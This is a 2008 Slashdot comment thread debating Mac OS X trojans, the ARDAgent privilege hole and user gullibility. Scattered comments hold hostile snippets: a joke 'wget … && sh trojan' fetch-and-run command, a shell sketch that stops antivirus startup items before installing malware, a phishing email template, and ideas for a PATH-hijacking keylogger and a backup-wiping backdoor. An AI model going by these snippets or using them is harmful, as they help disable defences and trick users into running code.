  I break into your machine over a network (irrelevant to what OS is running) and I wipe all of your files. I can't total your system because I need root/administrator access to it and although I can see that you run backups regularly to an external disk, it's not mounted or maybe unplugged - I can't mount it because I'm not an administrator and, of course, I'm not nest to your machine to be able to plug the disk in.
  So now I do the same thing having broken in as root/administrator. I *could* trash the complete system but instead I'm going to wipe your files. I then see you run backups regularly to an external disk. Can I mount it? Well, if I can then I can wipe that also - bye bye backups. If it's unplugged, I can't get to it - yet. But what I can do is maybe modify your backup program to just wipe the disk as soon as you plug it in, then trash the system completely.
  Yes, it's a specific scenario but entirely realistic so do you now see my point? The latter case is much more devastating than the former.
  
  --
  Gentoo Linux - another day, another USE flag.
21. Re:Society is not an OS X vulnerability by isorox · 2008-06-25 07:35 · Score: 1
  
  Your statement is a paradox. How can you care about your data and NOT care about the computer you store it on??? The same way I care about my DVDs, not my dvd player.
  Do you mean to tell me that applying security updates, running security scanners and malware checkers are not relevant??? Remind me never to give you any of MY data to keep safe then... Why would I care about your data? I don't manage servers (well, I do at work, but their application servers, and we rebuild them in 30 minutes).
  People don't want to know about security updates and malware crap, they want to access facebook and their bank, copy their photos, and manage their ipods, they don't care how it's done.
  Huh??? Why do you need to REPLACE /usr/bin/firefox??? Why not just put another (keylogging) Firefox binary into the user's $PATH so that version is run first? Why would you need root access to do this? Because menu items (how people load firefox), point to /usr/bin/firefox. You could change the menu, but that's only root-writable so the same thing applies.
  What relevance does Apache have here? What about an exploit using Microsoft IIS? Or Safari? Or SAMBA? Any client/server application that can be accessed over a network can be theoretically exploited... Yes, I used apache rather than sshd or X as it was the first server I thought of (being on a website at the time) -- and is one of the most likely to be exploited (more apache users than proftp). I've not heard of anyone running IIS on OSX or Linux, I guess it could be done through wine, but the explot would probably be harder.
  Most people don't need to run a server though, so a client exploit (which involves some form of user interaction) in a web browser or email client is more likely to cause an issue.
  Why would the average aware Linux user be running Apache? Sure, it can be installed easily enough but it's not installed by default on the Linux distros designed for desktop users that I'm aware of. Apache as an example, but you're right, samba is probably more common for a desktop users.
  Why is this any different to a breach of Apple's update web site? Or Microsoft's? I could argue this entirely the other way that since OS X and Windows are commercial OSes, there a lot more people torrenting and installing pirated copies of both that are infested with malware. At least with a Linux distro, the official web site will publish a checksum for the .ISO so at least you can check it with md5sum before you trust it. Why would I go to my distro (Ubuntu, Microsoft, Apple)'s website? A debian repository with secure-apt is (probably) better than Apple's auto-update, but the point is it's an unlikely, but feasable, way to breach.
  Are you really that blinkered that you cannot see that every point you have made can be levelled at every OS equally well? That was my point, I used Linux/OSX as an example as Windows (at least upto and including XP) is beyond hope, but it applies as easily to another BSD, or Solaris, or whatever.
  However, all that said, I'm not sure what anti-virus software would be able to cope with this sort of stuff. Something that emulate's tripwire, maybe
22. Re:Society is not an OS X vulnerability by pandrijeczko · 2008-06-25 10:21 · Score: 1
  
  The same way I care about my DVDs, not my dvd player.
  Terrible analogy, I'm afraid. You don't need to have a backup of a DVD to be able to play it if you lose your DVD player.
  People don't want to know about security updates and malware crap, they want to access facebook and their bank, copy their photos, and manage their ipods, they don't care how it's done.
  Running a virus or port scanner does not mean I have to understand how they work - just that I can deal with the problems produced by either. Still, don't take my word for it, do it your way.
  Because menu items (how people load firefox), point to /usr/bin/firefox. You could change the menu, but that's only root-writable so the same thing applies.
  Rubbish. Menu settings are usually stored in your home directory and can be changed as easily as your path can be. Besides which, they might not need to changed if the specific path to the executable is not specified. If it just says "firefox" for the binary that's run, then it will use the $PATH settings as I said earlier.
  I've not heard of anyone running IIS on OSX or Linux,
  And in none of my posts did I talk specifically about Linux - I was making generic statements about security.
  Most people don't need to run a server though, so a client exploit (which involves some form of user interaction) in a web browser or email client is more likely to cause an issue.
  You are correct to a point but simply going to a web site may cause a nasty Javascript or CGI script to run without you necessarily realising it.
  Why would I go to my distro (Ubuntu, Microsoft, Apple)'s website? A debian repository with secure-apt is (probably) better than Apple's auto-update, but the point is it's an unlikely, but feasable, way to breach.
  This is simply about one word - "confidence". I would never download a Windows XP update from BitTorrent but if I had the checksum for an ISO for a Linux distro then I would - because running the checksum on the ISO once I got it would allow me to verify its authenticity.
  
  --
  Gentoo Linux - another day, another USE flag.
FUDmeisters by Werrismys · 2008-06-24 20:22 · Score: 4, Insightful

It's F-Secure's business to cry wolf.

--
'Once scientists, even the dim-witted social scientists, get muzzled, the Western Civilization is finished.' - oldhack
1. Re:FUDmeisters by Deathlizard · 2008-06-25 02:26 · Score: 1
  
  If F-secure had an OSX version of their security products I would agree with you, but at this time they do not offer any protection for OSX.
  I know because we looked into it recently for students that have Macs on campus (we Use F-Secure Client Security here) and they flat out told us there is no F-Secure for OSX nor would there be, because it makes no business sense to spend the resources to build Protection for OSX when Apple itself tells it's userbase to (foolishly) not worry about viruses because OSX doesn't get them.
  If you're looking for a virus company with an OSX agenda, look at Symantec, McAfee, Sophos, or Securemac, which are the few AV vendors still making Antivirus products for the mac.
  
  --
  In Soviet Russia, Trojan exploits YOU!
You'd be amazed how dumb users are by Sycraft-fu · 2008-06-24 20:48 · Score: 5, Funny

I swear, some people go out of their way to infect their machines. The one that stands out in my mind the most was a virus for Windows a number of years ago. Came as an attachment in a message that said "Hi I send you the file in order to have your advice." So never mind the bad grammar and such, but before campus got hit we got wind of the thing and sent out an e-mail message to all users saying "Don't open this shit it's bad news." One of the users called in saying she was having problems with e-mail, we came and looked. The "problem" was that she wasn't an admin and so, thankfully, couldn't run the damn virus.
Or somewhat more recently we had a virus that slipped by our e-mail scanner. It did so by sending itself in encrypted zip files, and then putting the decryption key in the message. That meant you had to open the mail, save the zip, open the zip, enter the code, extract the executable, and run it. Two users did just that and got infected.
So while it seems armature to do a "Download this then enter your password," kind of trojan, that shit works waaaay more than you'd think.
1. Re:You'd be amazed how dumb users are by MichaelSmith · 2008-06-24 22:11 · Score: 1
  
  Somebody I know forwarded me a message saying something like There is a virus on your system. To remove it search for the file COMMAND.COM and delete it..
  
  Shortly after that I got a panicky phone call. Apparently they didn't have a working system any more.
  
  --
  http://michaelsmith.id.au
2. Re:You'd be amazed how dumb users are by houghi · 2008-06-25 00:13 · Score: 1
  
  So while it seems armature to do a "Download this then enter your password," kind of trojan, that shit works waaaay more than you'd think.
  Now there is a trojan for Linux as well: Just run the following on your Linux boxen:
  wget houghi.org/trojan && sh trojan
  
  --
  Don't fight for your country, if your country does not fight for you.
3. Re:You'd be amazed how dumb users are by ACMENEWSLLC · 2008-06-25 01:42 · Score: 1
  
  >>Or somewhat more recently we had a virus that slipped by our e-mail scanner. It did so by sending itself in encrypted zip files, and then putting the decryption key in the message. That meant you had to open the mail, save the zip, open the zip, enter the code, extract the executable, and run it. Two users did just that and got infected
  Once bitten, twice shy. Most people I know only do that once.
  Perhaps our schools should teach Internet security 101 to our students so that people are educated not to do this sort of stupid stuff. I don't know what you do with us old farts though.
  I still think that application should be virtualized each running with their own virtual registry and file system. Let that ActiveX control try to write to %windir%\system32\drivers\etc\hosts. It don't matter too much, it is a virtual file system which is not the real hosts file so it has no impact. Let that launched attachment run. If it crashes the virtual Outlook, a restart and everything is ok as the virtual part is clean each launch -- kinda like XP Embeded in it's normal mode (not write mode.)
  my .02
4. Re:You'd be amazed how dumb users are by Anonymous Coward · 2008-06-25 01:48 · Score: 0
  
  Armature : A framework around which a sculpture is built
  Amateur : A person attached to a particular pursuit, study, or science, without formal training or pay.
5. Re:You'd be amazed how dumb users are by Mr.+Roadkill · 2008-06-26 12:37 · Score: 1
  
  No, I would not be amazed by how dumb users can be.
  I'll see your "having trouble with attachments" (had that here from time to time too) and raise.
  The .edu.XX I work for recently had problems with lusers responding to the "Your XXX.EDU.XX account will be cancelled unless you send us your username and password and date-of-birth and country-of-birth details within three days" phishing mails that are doing the rounds at the moment. Some of them provided the correct details, causing no end of fun when we detected this (long before the nastygrams from Spamcop and AOL and individuals started rolling in, I might add), but most of them were too dumb to even get that right. On the bright side, it would have wasted some time in Lagos.
  What truly amazes me is that some of them can walk and breathe simultaneously.
  I'm waiting for the next level of attacks. At the moment, we've mostly just got the bot-herders and 419ers to worry about. What truly concerns me is that some of the phishers will probably take things up a level, and at some insitutions they probably have already.
  Say someone gets access to a user email account in a business or educational institution. They could start spamming from it right away, as is traditional, or they can look at the big picture and aim high - risking loss of short-term gains against a far bigger long-term payoff. A good starting point might be a message along the lines of:
  Thank you, $LUSER, for providing the requested details. Your $ORGNAME account will not be cancelled. We do, however, ask you to run the attached security update as soon as possible to protect you from certain kinds of malicious emails... That could have keyloggers and remote access clients and all kinds of other goodness. If the user has access to the organisation's finance system it might be possible for the attacker to run off a series of cheques or electronic payments - the proceeds of which could be remitted to Lagos via Western Union by local "payment processing agents" who have been recruited through email. Also, forget running a diploma-mill - you might be able to get duplicate testamurs from prestigious accredited institutions and academic transcript to go with them, just by changing the personal details of past graduates.
  Scary stuff, eh?
Re:GNAA Announces two new trojans for Windows 7! by RiotingPacifist · 2008-06-24 20:55 · Score: 1

not even first post, do you guys ever think about killing yourselves instead of bothering with this crap, i mean even twitter managed to get FP around here today, what happend to you GNAA, i thought u \/\/3R3 +3h 1337?

--
IranAir Flight 655 never forget!
I wouldn't call this crying wolf by Sycraft-fu · 2008-06-24 20:55 · Score: 4, Insightful

More like warning that just because you live in a good neighbourhood, doesn't mean you should leave your door unlocked. Too many people who have Macs take the lax approach of "Well Macs don't get hacked so I don't have to worry." Ok well maybe they generally don't (though I've seen it happen due to immense user stupidity) but you should still assume that it can happen, and have security to prevent it.
I'm all about proactive security, not reactive. Don't wait until something is a problem, identify weaknesses and fix that shit BEFORE someone exploits it. If nobody ever tries, ok great. However if someone does, you are glad you set up security.
As I said it is the difference between living in a low crime neighbourhood and a high one. You live in a low crime neighbourhood and figure "Oh well there's no crime here, so I don't need to bother with a door lock or alarm." Ok, that's great right up until the criminals try, then you are screwed since you had no security. Well someone who lives in a high crime neighbourhood might have to put up with attempts more often but if they have their doors locked, windows barred, alarm on and so on it doesn't matter because their security stops it.
Computers are the same way. Just because you run a platform that isn't targeted much, doesn't mean you should just ignore security. Hope for the best but prepare for the worst, then you are ready no matter what.
It is like backups. Backups are a waste of time and money when your system has always been reliable... Right up until the moment when it isn't and you lose all your shit. You hope you never need the backups, and most won't computers are pretty reliable, but you make them anyways just in case. You prepare for the worst, even if it is unlikely, so that if it hits you aren't screwed.
1. Re:I wouldn't call this crying wolf by SoupIsGood+Food · 2008-06-24 23:13 · Score: 1
  
  What do you mean "Worry?" About what? Running crappy shareware?
  Trojans and phishing are pretty solidly entrenched in the minds of the Mac userbase with some sort of clue, and those without a clue are generally unaware that there's such a thing as F-Secure, and are unlikely to download dodgy shareware apps anyhow.
  I keep hearing alarm bells rung, and it always turns out to be much ado about nothing. The Mac uses a modern privilege escalation model, and Apple's taken some pains to make sure their systems come configured with reasonable default settings, and seems to do a fair job of patching holes as they crop up. I'm not certain what else you expect of the platform or its users.
  To be frank, it sounds like Platform Wars baloney: "Nuh-uh your Mac's more secure than Windows XP, F-Secure knows a guy who knows a guy who once heard of someone who made a proof-of-concept crack, so you need to be aware you're no better than a Dell fresh outta the box!"
  OK guy, we'll lose a lot of sleep over it, 'K? Have fun with your two AV platforms and three malware checkers, because one of each will =not= do the trick to keep XP clean.
  Taking care to download positively reviewed software from vetted locations is all it takes to stay safe on the Mac at the moment, and this is unlikely to alter much in the foreseeable future.
2. Re:I wouldn't call this crying wolf by the_plastic_jesus · 2008-06-24 23:48 · Score: 1
  
  While it is pretty serious, how many people here are likely to get this? It's not quite like the situation on Windows where you can get malware by opening the wrong windows (just yet), but I'd imagine that most would only download from sites they'd trust. I'd say the best advice to the whole Mac user community is just to exercise a little caution over the sites they download things from, rather than just blindly visiting every web site believing that they're invulnerable to every bug out there. In fact, that just applies to any OS period...
3. Re:I wouldn't call this crying wolf by Anonymous Coward · 2008-06-25 02:03 · Score: 0
  
  Computers are the same way. Just because you run a platform that isn't targeted much, doesn't mean you should just ignore security. Hope for the best but prepare for the worst, then you are ready no matter what. I agree. There is a need to be proactive when it comes to security on Mac OS X. I use and recommend Symantec® Norton AntiVirus® for Macintosh®. It is low cost, has great features, and make my computing platform safer. It is worth every penny.
4. Re:I wouldn't call this crying wolf by NtroP · 2008-06-25 04:57 · Score: 1
  
  Most of the Mac users I know have switched from Windows and are so paranoid and twitchy about installing anything on their system it's ridiculous. I helped my neighbor switch a few months ago and he refused to use his shiny new iMac until he'd received his Symantic Antivirus software in spite of my assurances that he'd be fine until it arrived.
  
  I keep hearing the meme about Mac users (usually typed MAC users) claiming they are invulnerable, but have yet to run into one myself. I'm sure they must exist, but they must be pretty rare. On the other hand, I have found that Mac users actually had to make a conscious and informed choice to *not* run to Walmart or Dell and get a default computer. This would seem to mean that they might be a bit more aware, in general, than the "unwashed masses" who don't even know there are options out there. This goes double for Linux users. I think (at least for now) that fact will protect Mac users more than anything.
  
  I sincerely hope that Macs never become the "default" computer and that people will always have to make a conscious choice to use it.
  
  --
  "terrorism" and "pedophilia" are the root passwords to the Constitution
An unpopular opinion.... by Toreo+asesino · 2008-06-24 20:56 · Score: 0, Redundant

I'm sure this will go down like a lead balloon here, but this is one example of how, technically at least, Vista is more secure than OSX in this regard...
Because no user can ever be root without a UAC elevation, no program can "just ask for the password" and therefore get admin privileges quite so easily.
Of course, if the user clicks "Continue" anyway, then you're screwed in any OS but that's another story.....
*ducks*

--
throw new NoSignatureException();
1. Re:An unpopular opinion.... by Urd.Yggdrasil · 2008-06-24 21:26 · Score: 1
  
  Vista has it's fair share of privilege elevation exploits.
2. Re:An unpopular opinion.... by ThorGod · 2008-06-24 21:40 · Score: 1
  
  I see what you're saying. Honestly, I would love the idea of my user accounts not being able to do anything but exactly that - use the machine (not make any system changes). But, ultimately, user processes have to at some point interact with root processes through apis and such. So, to some extent, you're always going to have the potential for a problem.
  Unless Steve Jobs had his goons rig up a virtualization scheme whereby when a user logged in they were, in effect, 'booting' into a virtual machine. It could be cluggy, but I bet there's a way to do it right.
  How do you think that'd be for security?
  
  --
  PS: I don't reply to ACs.
3. Re:An unpopular opinion.... by Anonymous Coward · 2008-06-24 21:46 · Score: 3, Informative
  
  I think you misunderstand how it works on OS X
  When an application asks for a password to get admin rights, the user is presented with a dialog, but unlike in Vista, actually needs to type the password to continue. You can't just blindly click "OK".
4. Re:An unpopular opinion.... by Toreo+asesino · 2008-06-24 21:47 · Score: 1
  
  Yep, well, actually that's another thing UAC does too - critical file & registry read/writes are virtualized into something stored in just the users directory, so apps that try get round UAC still work & the system is still secure.
  But ultimately, root stuff is still necessary, and it's only the user that can ultimately decide whether or not to allow each request.
  
  --
  throw new NoSignatureException();
5. Re:An unpopular opinion.... by Anonymous Coward · 2008-06-24 21:50 · Score: 0
  
  it doesnt matter if it is called continue or OK, user will press on it, specially seeing it so damn often.
6. Re:An unpopular opinion.... by John+Betonschaar · 2008-06-24 21:52 · Score: 1, Redundant
  
  I don't really see the difference between OS X privilege escalation using a password prompt and sudo or Vista using UAC. If you allow the program admin privileges you're screwed, and I believe it's just as easy to implement this on Vista as it is on OS X. On linux it might be a little bit harder because different distro's use different sudo configurations.
  As for the ARDAgent vulnerability: that's a completely different story, it's a serious security flaw that needs to be fixed very, very fast.
7. Re:An unpopular opinion.... by Toreo+asesino · 2008-06-24 21:54 · Score: 3, Interesting
  
  It's more the impersonation I was talking about.
  In windows you can launch a process impersonating a windows user if you want to run under different credentials. So with the string value from the "Enter Pa33w0rd n00b" window, you could in XP, for instance run a new process under "root" privs, and hose the system however you wanted (assuming the password was ok). In Vista this is impossible.
  
  --
  throw new NoSignatureException();
8. Re:An unpopular opinion.... by Tim+C · 2008-06-24 22:05 · Score: 1
  
  Interesting. Care to provide any examples?
  
  --
  It's official. Most of you are morons.
9. Re:An unpopular opinion.... by Toreo+asesino · 2008-06-24 22:08 · Score: 1
  
  Sorry for copy & paste, but I just tried to clear what I meant above....
  It's more the impersonation I was talking about.
  In windows you can launch a process impersonating a windows user if you want to run under different credentials. So with the string value from the "Enter Pa33w0rd n00b" window, you could in XP, for instance run a new process under "root" privs, and hose the system however you wanted (assuming the password was ok). In Vista this is impossible.
  
  --
  throw new NoSignatureException();
10. Re:An unpopular opinion.... by Anonymous Coward · 2008-06-24 23:24 · Score: 0
  
  A 'Continue' button instead of a password. This Vista truly is an example unto the rest of the computing world!
11. Re:An unpopular opinion.... by gnasher719 · 2008-06-25 00:16 · Score: 1
  
  I don't really see the difference between OS X privilege escalation using a password prompt and sudo or Vista using UAC. If you allow the program admin privileges you're screwed, and I believe it's just as easy to implement this on Vista as it is on OS X. On linux it might be a little bit harder because different distro's use different sudo configurations. Once the trojan runs, you are quite screwed anyway, whether it has root privileges or not. It's different if you have a server with hundred users; as long as root isn't vulnerable, only one out of the hundred users can get hosed. But if you are using a home computer with a single user, even with user privileges only the trojan has access to hundred percent of all user data and can delete it, modify it, encrypt it and blackmail the user, or mail it somewhere else. In that case I don't care about the system; all that can be easily restored. For home users, there isn't much difference between a root exploit and a user only exploit.
12. Re:An unpopular opinion.... by ruiner13 · 2008-06-25 03:14 · Score: 1
  
  your analogy needs work. Mythbusters got a lead balloon to fly. Perhaps next time you should use "go down like a fart in an elevator".
  
  --
  today is spelling optional day.
13. Re:An unpopular opinion.... by 99BottlesOfBeerInMyF · 2008-06-25 09:20 · Score: 1
  
  There are actually, regular privilege escalations for Vista reported both discovered and in use in the wild. When I worked at a security firm last year, I saw about one a week in our weekly security bulletin. Here's one from the other day.
Link plz by Anonymous Coward · 2008-06-24 21:11 · Score: 0

I'd like a look at the source mentioned ("Now that the source of the proof-of-concept is publicly available") but I can't find anything beside the MacShadow-Forums where you have to log in. Anyone care to paste it to a pastebin or something?
Also, every page on the web uses the exact words "Applescript Trojan horse template was crafted by forum participants of " ... no creativity huh?
"Politely request your password"... Meh by Yer+Mum · 2008-06-24 21:12 · Score: 0

A trojan which requires the user to manually download and run it isn't really a trojan...

And if a program requests the root password and the user gives it, is this the OS's fault? (In fact preference files are stored in the user's home directory, they don't need a password.)
1. Re:"Politely request your password"... Meh by gnasher719 · 2008-06-24 21:56 · Score: 4, Insightful
  
  A trojan which requires the user to manually download and run it isn't really a trojan... A trojan which requires the user to manually download and run it is _exactly_ a trojan. It is not a worm or a virus. A "trojan" is software that makes the user believe it does something useful or entertaining while in reality containing malware, and it relies on the user getting around security in order to access the useful or entertaining bits.
2. Re:"Politely request your password"... Meh by Tim+C · 2008-06-24 22:13 · Score: 4, Insightful
  
  That is exactly what a trojan is!
  A trojan is a piece of software that appears to be benign or otherwise safe or desirable, but in fact is malign. It may or may not also act as advertised.
  A virus is a piece of software that piggy-backs on other executables, "infecting" them with its own code and modifying them so that when they are launched, the virus code is also run. They spread by searching for and infecting other executables on the machine.
  A worm is self-propagating, and does not require user intervention. It actively seeks out and exploits a given vulnerability or vulnerabilities, using them to covertly gain access to the machine.
  Of the three broad types of malware, the only one that does not require the user to manually run it is a worm.
  And if a program requests the root password and the user gives it, is this the OS's fault?
  No, of course not - but you'd be amazed at the number of people who blame Windows even for such social engineering tricks, or believe that if we only all switched to Linux malware would be a thing of the past. The weakest link in any computer system is the user, and there's little or nothing an OS can do to protect itself from a naive or malicious user armed with the root/admin password. While this is a non-story, it does at least demonstrate that the same is true of other OSes than Windows.
  
  --
  It's official. Most of you are morons.
3. Re:"Politely request your password"... Meh by pandrijeczko · 2008-06-24 22:38 · Score: 1
  
  Quite frankly, I think you OS X people need to do a little less hero worshipping and a little more reading of technical manuals.
  Let's get this entirely out in the open, okay? An inexperienced user is potentially a danger on ANY operating system, including your beloved OS X. If you make an executable or email attachment seem valid enough, then there ARE Windows/Linux/OS X users who will run it, just like there have been a lot of surprised people on Slashdot previously when they installed Apple Quicktime updates and discovered it had also installed Safari - this does NOT happen if you know what you are doing and pay attention to what is being shown to you on the screen. No debate, it's fact.
  The additional hurdles that both Windows and OS X have to overcome are twofold:
  1. Both make money for their respective companies who (understandably) want to shift as much volume as possible. Therefore, the core marketing strategies of both Apple and MS have been to convince Joe Public that you don't need a computer degree in order to use their OSes. Also, rightly or wrongly, the perception of Joe Public is that Linux is difficult to use. Therefore the net result is that in all probability, people who use Windows or OS X are more likely to be newbie users who are more prone to running everything with admin privileges or being duped into running a Trojan.
  2. Windows and OS X present nice fat targets for people who write malware because in both cases you have big populations of users running essentially the same systems. This means that the propagation of malware within Windows or within OS X is potentially much better than it is through disparate sets of systems. Again, if Ubuntu, for example, becomes the de facto standard Linux OS then it too could also present a nice fat target to malware writers - but the fact is that at this moment in time, there are that many different distros running that it makes it very difficult to target a single Linux application with malware that would propogate to the same degree as it would potentially do on Windows or OS X.
  So please don't get defensive about OS X because if you just bury your head in the sand and do nothing about it, then you put yourself more at risk of a malware attack getting onto your system.
  Any piece of malware is a risk to any system but good security is about limiting that risk as much as possible - so it's about putting firewalls in place, putting updates on systems regularly, scanning systems regularly, etc. etc.
  
  --
  Gentoo Linux - another day, another USE flag.
4. Re:"Politely request your password"... Meh by tgd · 2008-06-25 00:45 · Score: 1
  
  trojan
  I do not think that word means what you think it means.
5. Re:"Politely request your password"... Meh by stewbacca · 2008-06-25 02:56 · Score: 1
  
  And if a program requests the root password and the user gives it, is this the OS's fault?
  No, of course not - but you'd be amazed at the number of people who blame Windows even for such social engineering tricks, or believe that if we only all switched to Linux malware would be a thing of the past.
  People "blame" windows for their own stupidity because there are about 1,000,000 schemes out there that attack windows users. Compare that to Linux and OSX and you start to see why I believe in the security-through-obscurity "misnomer". Sure my Mac may not be any more secure, but I'm not getting assaulted 10 times a day either.
6. Re:"Politely request your password"... Meh by 99BottlesOfBeerInMyF · 2008-06-25 04:18 · Score: 1
  
  Of the three broad types of malware, the only one that does not require the user to manually run it is a worm.
  I believe you are slightly incorrect. A worm is malware that propagates without direct action of the user. Malware that executes without user interaction (but does not propagate automatically) is still a virus. A good example would be the viruses that used to find their way onto CDs and which would autorun on Windows and infect the machine without user interaction to run (just to propagate).
7. Re:"Politely request your password"... Meh by AceCaseOR · 2008-06-25 06:20 · Score: 1
  
  So please don't get defensive about OS X because if you just bury your head in the sand and do nothing about it, then you put yourself more at risk of a malware attack getting onto your system. Any piece of malware is a risk to any system but good security is about limiting that risk as much as possible - so it's about putting firewalls in place, putting updates on systems regularly, scanning systems regularly, etc. etc The sad thing is that there are enough casual users who are running Apples that aren't running security software at all. Every time I've gone into an Apple store, I've overheard Apple Salespeople telling customers who ask about getting Anti-Virus software that "Apples don't get viruses." Heck, the implication that Apples are immune to viruses has made it into the Switch ads. Stuff like this leads to a culture of complacency among casual apple users, that makes the likelyhood of a major virus outbreak more likely.
  
  --
  Zagreus sits inside your head, Zagreus lives among the dead, Zagreus sees you in your bed and eats you in your sleep.
8. Re:"Politely request your password"... Meh by jamrock · 2008-06-25 15:56 · Score: 1
  
  Well done, and I'm sorry you can't get more than a score of 5 for your post. That's a beautifully concise summary of the differences among trojan, virus, and worm, as well as pinning the responsibility for most malware infections where it truly belongs, on ignorant or foolish users. Kudos.
Aren't you forgetting something? by Undead+NDR · 2008-06-24 21:29 · Score: 1

chmod +x coolGame.sh
well... by W33B · 2008-06-24 22:28 · Score: 0

I work in a design studio with 8 mac users (I'm the only pc user...sob) and the common thought here is that mac's just don't do anything bad....ever!

Even when their profiles get corrupted and they have to wipe their machines they tend to see it as a normal mac thing that has to be done every now and again...and happily carry on regardless.

The problem with these types of mac users is that they completely trust everything the os is telling them because what reason do they have to doubt it..?

With this mentality (whick I'm sure is not isolated to my office) the trojan politely asking for a password will be successfull 99% of the time.

just my 2 cents
1. Re:well... by falcon5768 · 2008-06-24 22:50 · Score: 1
  
  why would you reinstall for a corrupted profile? I have gotten one maybe twice and both times was easily repaired. Why would your IT dept even ALLOW that?
  
  --
  "Slashdot, where telling the truth is overrated but lying is insightful."
2. Re:well... by W33B · 2008-06-24 23:21 · Score: 0
  
  as stated...I work in a design studio with 8 others, we have no such thing as an IT dept.
  
  I myself also thought this was ridiculous but not being a mac user (or having any interest in becoming one) I just leave them to it and keep my mouth shut!
  
  design studio = designers <> slashdot readers
3. Re:well... by falcon5768 · 2008-06-25 01:06 · Score: 1
  
  I still find it strange though, since mac designers I know (and I do know a few having come from a newspaper) are usually very smart about their macs specifically because if they go to a big house there tends to be a push and pull match between them and their IT department. Are they older designers? Cause I could understand if they are holding on to the old OS 9 mentality where you DID reinstall everything (and crossed your fingers to boot) but all that went out the window 10 years ago.
  
  --
  "Slashdot, where telling the truth is overrated but lying is insightful."
OS X has no functional root by Anonymous Coward · 2008-06-24 22:44 · Score: 0

Root on OS X is off by default out-of-the-box, isn't it?
1. Re:OS X has no functional root by ktappe · 2008-06-25 00:42 · Score: 3, Informative
  
  Root on OS X is off by default out-of-the-box, isn't it?
  Yes, it is off by default.
  
  --
  "We can categorically state we have not released man-eating badgers into the area." - UK military spokesman, July 2007
2. Re:OS X has no functional root by Anonymous Coward · 2008-06-25 12:32 · Score: 0
  
  Root on OS X is off by default out-of-the-box, isn't it?
  Yes, it is off by default.
  NO it isn't. You simply can't login as Root. however these exploits will work fine executing as root.
Smaller-market-share-as-security myth by Immerial · 2008-06-24 23:03 · Score: 1

I think the whole smaller market share as security is a myth... at least as a main reason, IMHO. I'm sure it has some effect but nothing as big as people say. Currently there are at least ~26 million Macs out there (being very conservative), which is still a lot of machines. Heck, even Mac OS 9 had more viruses and Macs had a much smaller market share. I'm sure somebody would have done something by now if it was easy.
Lies by Anonymous Coward · 2008-06-24 23:59 · Score: 0

Everyone knows that there are no such things as malware/trojans/viruses on Macs and can never, ever be any. Blessed Saint Steve (PBHN) has declared it to be so. "It just works."
1. Re:Lies by stewbacca · 2008-06-25 03:21 · Score: 1
  
  Thanks for contributing.
The suggested fix for ARDAgent... by mario_grgic · 2008-06-25 00:26 · Score: 1

A lot of websites are now suggesting changing the permissions on the ARDAgent to remove the SUID bit on it.
This works until you repair the permissions (using disk utility which consults its database of permissions) and this puts it right back making you vulnerable again.

--
As the island of our knowledge grows, so does the shore of our ignorance.
1. Re:The suggested fix for ARDAgent... by guruevi · 2008-06-25 01:21 · Score: 1
  
  The problem is, some of use require that ARDAgent to work as it is supposed to. I am using Apple Remote Desktop to manage workstations and it does a darn good job. I can send root commands like softwareupdate -i -a to all agents and they do their work and report back to me.
  Apple needs to fix this although I think the problem would only exhibit itself when somebody has gained access to the local network. As for the other one, that is not a trojan, just a script and a virus scanner wouldn't help either since I could write the following script:
  if [ -f "/Library/StartupItems/NortonAutoProtect" ]; then /Library/StartupItems/NortonAutoProtect/NortonAutoProtect stop
  fi
  if [ -f "/Library/StartupItems/ClamXAv" ]; then /Library/StartupItems/ClamXAv/ClamXAv stop
  fi
  etc. etc.
  then install something nasty
  
  --
  Custom electronics and digital signage for your business: www.evcircuits.com
OSX VIRUS MAKERS. Do Better! by Flaystus · 2008-06-25 00:28 · Score: 1

Really you guys are just letting us down time and time again. We need a GOOD exploit if we are ever to bridge the software divide between the two platforms! OSX Virus makers, please step up your game.
3rd Virus Spotted. This one in the wild! by Anonymous Coward · 2008-06-25 00:36 · Score: 0

All a user my do to be infected is connect through the internet...via a Linksmart GR90S v2.5465b router, then visit google.com then go to your local CompUSA and purchase a copy of Diablo 3 and install it. Register the key code for Diablo 3 then goto the local brick yard. Buy exactly 2 bricks, then go home. Smash their machine with the brick then go out to the tattoo shop and have your SSN, Login, and Password for your bank tattooed on your forehead.
No, non-password variants won't appear by ktappe · 2008-06-25 00:46 · Score: 3, Insightful

we can expect that future trojans won't just politely request your password. Um....except that they won't have any choice. If they want to modify the filesystem, OS X won't let them unless they've obtained authority and that requires them doing so via the authentication system that asks for the user's password. The above fact IS the OS X security system doing its job. If a user chooses to subvert the system by entering their password whenever requested without asking any questions, then how is that OS X's fault? Do you hand your housekey to any random guy who walks up on the street? Then don't give your password to random software. I could tell before I even checked that this "story" was approved by kdawson.

--
"We can categorically state we have not released man-eating badgers into the area." - UK military spokesman, July 2007
1. Re:No, non-password variants won't appear by 99BottlesOfBeerInMyF · 2008-06-25 04:24 · Score: 1
  
  ...we can expect that future trojans won't just politely request your password. Um....except that they won't have any choice. If they want to modify the filesystem, OS X won't let them unless they've obtained authority and that requires them doing so via the authentication system that asks for the user's password.
  I think you're missing the point. The proof of concept escalated privilege without the password using a hole. The second trojan is in the wild and asks for a password. If the author of the second takes the code from the first, then we'd end up with just that. Maybe that will happen and maybe it won't, but it can happen.
Harumph. If you were a teacher.... by supercrisp · 2008-06-25 00:51 · Score: 1

If you were a teacher, you wouldn't be surprised at the level of moronism among students and faculty. I'm convinced we see as much if not more idiocy than systems folks. Two examples from the last semester:
Story One: A freshman student this semester copied her whole paper from a graduate-student textbook written by a PhD researcher. Cut and paste. I catch it, tell her she's getting an F. She turns in her next paper, same composition method. Zero, expulsion.
Story Two: I get my teaching evaluations back from the faculty committee. They say I'm awesome, god's sliced cheese, EXCEPT for two problems: my grading rubric is too confusing and I have no schedule of readings. BUT, my grading rubric was an exact copy of the one on the department website that I was told to use, and my schedule of readings was three of the six pages I submitted for their review.
Moral: Never be surprised at how idiotic people can be on a university campus. Some days it's almost like an upperclass twit of the year contest.
OMGZ it's teh OS X trojanz! by Yvan256 · 2008-06-25 01:12 · Score: 0, Redundant

Trojan asks users for password, intelligent users are safe, news at 11.
ARDAgent on Tiger by goombah99 · 2008-06-25 01:43 · Score: 2, Insightful

I've tried the ARDAagent on dozens of different people's computers now and it only worked on Leopard not on Tiger.
Has anyone seen this work on Tiger? If so what's the configuration where it actually works.
It also does not work on most Leopard computers as things like Fast User switching, or having remote desktop turned on (yes on) cause it to fail.
Now as for trojans. Well what can you say. All computers are vulnerable to trojans. The poker game would run on linux too.
in the case of the poker game download the mac is going to ask you three times:
1) The item being downloaded contains an application, are you sure?
